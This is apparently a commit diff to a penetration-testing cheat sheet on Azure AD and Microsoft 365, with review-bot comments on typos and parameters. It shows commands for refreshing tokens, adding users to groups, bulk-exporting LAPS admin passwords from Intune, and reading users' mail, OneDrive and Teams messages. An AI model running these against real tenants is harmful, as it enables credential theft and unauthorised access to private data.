Folder tree update
parent
1285fd980b
commit
24fe926630
|
@ -69,21 +69,21 @@ roadtx gettokens --refresh-token <refresh-token> -c 04b07795-8ddb-461a-bbee-02f9
|
||||||
```
|
```
|
||||||
|
|
||||||
```
|
```
|
||||||
scope resource client
|
scope resource client
|
||||||
.default 04b07795-8ddb-461a-bbee-02f9e1bf7b46 04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
.default 04b07795-8ddb-461a-bbee-02f9e1bf7b46 04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
||||||
1950a258-227b-4e31-a9cf-717495945fc2 1950a258-227b-4e31-a9cf-717495945fc2
|
1950a258-227b-4e31-a9cf-717495945fc2 1950a258-227b-4e31-a9cf-717495945fc2
|
||||||
https://graph.microsoft.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://graph.microsoft.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
||||||
https://graph.windows.net 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://graph.windows.net 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
||||||
https://outlook.office.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://outlook.office.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
||||||
Files.Read.All d3590ed6-52b3-4102-aeff-aad2292ab01c d3590ed6-52b3-4102-aeff-aad2292ab01c
|
Files.Read.All d3590ed6-52b3-4102-aeff-aad2292ab01c d3590ed6-52b3-4102-aeff-aad2292ab01c
|
||||||
https://graph.microsoft.com d3590ed6-52b3-4102-aeff-aad2292ab01c
|
https://graph.microsoft.com 3590ed6-52b3-4102-aeff-aad2292ab01c
|
||||||
https://outlook.office.com 1fec8e78-bce4-4aaf-ab1b-5451cc387264
|
https://outlook.office.com 1fec8e78-bce4-4aaf-ab1b-5451cc387264
|
||||||
Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
https://outlook.office.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://outlook.office.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
https://outlook.office365.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://outlook.office365.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
|
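Review bot: The new side of the `Files.Read.All` / `https://graph.microsoft.com` row has the client ID `3590ed6-52b3-4102-aeff-aad2292ab01c`, which drops the leading `d` that the old side and the row above it carry (`d3590ed6-52b3-4102-aeff-aad2292ab01c`). This looks like an accidental edit in what is otherwise a whitespace-only change to the table. Restore the full GUID so the table stays accurate.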
@ -11,6 +11,15 @@
|
||||||
```ps1
|
```ps1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* Add user to a group
|
||||||
|
```ps1
|
||||||
|
$groupid = "<group-id>"
|
||||||
|
$targetmember = "<user-id>"
|
||||||
|
$group = Get-MgGroup -GroupId $groupid
|
||||||
|
$members = Get-MgGroupMember -GroupId $groupid
|
||||||
|
New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Devices
|
## Devices
|
||||||
|
|
||||||
|
|
|
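Review bot: In the added "Add user to a group" block, `$group = Get-MgGroup -GroupId $groupid` and `$members = Get-MgGroupMember -GroupId $groupid` are assigned but never read before `New-MgGroupMember` runs. Either drop the two lookups or use `$members` to skip the call when `$targetmember` is already in the group. The parameter is also written `-DirectoryObjectid`; PowerShell accepts it, but `-DirectoryObjectId` matches the cmdlet's own spelling.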
@ -22,10 +22,13 @@ Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Azure AD - Conditionnal Access
|
## Azure AD - Conditionnal Access Policy
|
||||||
|
|
||||||
Enumerate Conditionnal Access Policies: `roadrecon plugin policies`
|
Enumerate Conditionnal Access Policies: `roadrecon plugin policies`
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Azure AD - MFA
|
## Azure AD - MFA
|
||||||
|
|
||||||
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
|
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
|
||||||
|
|
|
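Review bot: The renamed heading `## Azure AD - Conditionnal Access Policy` keeps the misspelling "Conditionnal", and so does the "Enumerate Conditionnal Access Policies" line below it. Since the heading text is being changed anyway, and any link to its anchor will need updating, correct both to "Conditional" in this commit.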
@ -5,9 +5,10 @@
|
||||||
> The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.
|
> The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.
|
||||||
|
|
||||||
Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole`
|
Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole`
|
||||||
|
|
||||||
* **Disable user consent** : Users cannot grant permissions to applications.
|
* **Disable user consent** : Users cannot grant permissions to applications.
|
||||||
* **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant
|
* **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant
|
||||||
* **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent,
|
* **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent.
|
||||||
* **Custom app consent policy**
|
* **Custom app consent policy**
|
||||||
|
|
||||||
### Register Application
|
### Register Application
|
||||||
|
|
|
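Review bot: The context line just above the edited bullet gives the cmdlet as `GetAzureADMSAuthorizationPolicy`, without the hyphen, so the command fails when copied. This hunk already tidies punctuation in the same list, so change it to `Get-AzureADMSAuthorizationPolicy` here as well. The second bullet also still ends without a period, while the bullet fixed in this hunk now has one.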
@ -22,9 +22,27 @@ Runbook must be SAVED and PUBLISHED before running it.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Microsoft Intune
|
||||||
|
|
||||||
|
* LAPS
|
||||||
|
```ps1
|
||||||
|
#requires -modules Microsoft.Graph.Authentication
|
||||||
|
#requires -modules Microsoft.Graph.Intune
|
||||||
|
#requires -modules LAPS
|
||||||
|
#requires -modules ImportExcel
|
||||||
|
|
||||||
|
$DaysBack = 30
|
||||||
|
Connect-MgGraph
|
||||||
|
Get-IntuneManagedDevice -Filter "Platform eq 'Windows'" |
|
||||||
|
Foreach-Object {Get-LapsAADPassword -DevicesIds $_.DisplayName} |
|
||||||
|
Where-Object {$_.PasswordExpirationTime -lt (Get-Date).AddDays(-$DaysBack)} |
|
||||||
|
Export-Excel -Path "c:\temp\lapsdata.xlsx" - ClearSheet -AutoSize -Show
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Office 365
|
## Office 365
|
||||||
|
|
||||||
### Extracting Microsoft Teams Messages
|
### Microsoft Teams Messages
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
TokenTacticsV2> RefreshTo-MSTeamsToken -domain domain.local
|
TokenTacticsV2> RefreshTo-MSTeamsToken -domain domain.local
|
||||||
|
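Review bot: The last line of the added LAPS block, `Export-Excel -Path "c:\temp\lapsdata.xlsx" - ClearSheet -AutoSize -Show`, has a space between `-` and `ClearSheet`, so the switch is not parsed as a parameter; it should read `-ClearSheet`. In the same pipeline, `Get-LapsAADPassword -DevicesIds` should be `-DeviceIds`. Separately, the `### Extracting Microsoft Teams Messages` heading is renamed to `### Microsoft Teams Messages`, which changes its anchor; check for links pointing at the old one.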
@ -32,15 +50,26 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token |
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Outlook
|
## Outlook Mails
|
||||||
|
|
||||||
* Read user messages
|
* Read user mails
|
||||||
```ps1
|
```ps1
|
||||||
Get-MgUserMessage -UserId <user-id> | ft
|
Get-MgUserMessage -UserId <user-id> | ft
|
||||||
Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id>
|
Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## OneDrive Files
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
$userId = "<user-id>"
|
||||||
|
Import-Module Microsoft.Graph.Files
|
||||||
|
Get-MgUserDefaultDrive -UserId $userId
|
||||||
|
Get-MgUserDrive -UserId $UserId -Debug
|
||||||
|
Get-MgDrive -top 1
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)
|
* [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)
|
||||||
|
* [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview)
|
|
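Review bot: The added OneDrive block calls `Get-MgUserDrive -UserId $UserId -Debug`, where the `-Debug` switch looks like a leftover from testing; drop it or explain why the debug output is wanted. The variable is also declared as `$userId` and then used as `$UserId`, which works but is worth making consistent. The new `## OneDrive Files` and renamed `## Outlook Mails` headings sit at the same level as `## Office 365`, while the Teams section is a `###` under it, so consider `###` for both if they are meant to be Office 365 subsections.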
@ -1,4 +1,4 @@
|
||||||
# Bug Hunting Methodology and Enumeration
|
# Bug Hunting Methodology
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|